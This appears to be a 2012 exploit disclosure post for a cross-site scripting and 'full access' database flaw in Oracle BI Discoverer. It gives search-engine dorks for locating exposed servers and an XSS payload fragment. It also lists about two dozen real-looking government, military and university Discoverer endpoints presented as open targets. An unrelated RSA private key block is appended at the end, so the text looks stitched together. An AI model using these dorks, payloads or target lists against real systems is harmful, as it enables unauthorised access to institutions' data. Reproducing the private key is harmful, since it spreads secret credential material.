-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat
# Home: ur0b0r0x.blogspot.com
# Exploit Title: OracleBI Discoverer Ver 10.1.2.48.18 - Full Acces Data Base - Cross Site Scripting
# dork1:inurl:discoverer/viewer?
# dork2:inurl:/discoverer/app/connection
# dork3:inurl:/discoverer/app/econnection
# dork4:inurl:/discoverer/app/
# dork5:inurl:/discoverer/app/explorer"
# Date: 12/12/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html
# Vendor Name: Oracle
# Tested On: Backtrack R3 / Linux Mint
# Type: php
------------------- Agreement --------------------
[08/12/2012] - Vulnerability discovered
[11/12/2012] - Vendor notified Dont responsed
[12/12/2012] - Public disclosure
--------------------------------------------------
#Proof Concept
http://ur0b0r0x.blogspot.com/
#Code/Xss/Path
explorer?node=">
#Code/Active contracts by Opdiv,office code,completion date - Active Contracts
Sample/Demo/Full_Access/
http://dcis04.psc.gov/discoverer/app/econnection
http://abac.upf.edu/discoverer/app/econnection
http://mytest.sfwmd.gov/discoverer/app/econnection
http://demoa.ocu.es/discoverer/app/econnection
http://www.paaf.gov.kw/discoverer/viewer
http://www.qix.gov.qa/discoverer/app/econnection
http://discoverer.banrep.gov.co/discoverer/app/econnection
http://statistik.forsakringskassan.se/discoverer/app/econnection
https://oasext.epa.gov/discoverer/app/econnection
http://www.reeis.usda.gov/discoverer/app/connection
http://cbi.superfinanciera.gov.co/discoverer/app/econnection
http://mytest.sfwmd.gov/discoverer/app/econnection
http://owl.cuny.edu:7778/discoverer/app/econnection
http://oaspruebas.policia.gov.co:7778/discoverer/app/connection?event=displayConnections
http://siadapp.dmdc.osd.mil/discoverer/viewer
http://xportalt.sfwmd.gov/discoverer/app/connection
http://siadapp.dmdc.osd.mil/discoverer/viewer
http://www.cdr.isa.org.jm/discoverer/app/econnection
http://suamox03.dane.gov.co:7778/discoverer/app/econnection
http://iaorap1.mincetur.gob.pe:7778/discoverer/viewer
http://discoverer.dnr.state.la.us/discoverer/app/connection
http://www.moi.go.th/discoverer/app/econnection
http://www.reeis.usda.gov/discoverer/app/econnection
http://www.st.nmfs.noaa.gov/discoverer/app/connection
http://portal.nysed.gov/discoverer/app/connection
http://190.242.99.238/discoverer/app/econnection
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/
-----END RSA PRIVATE KEY-----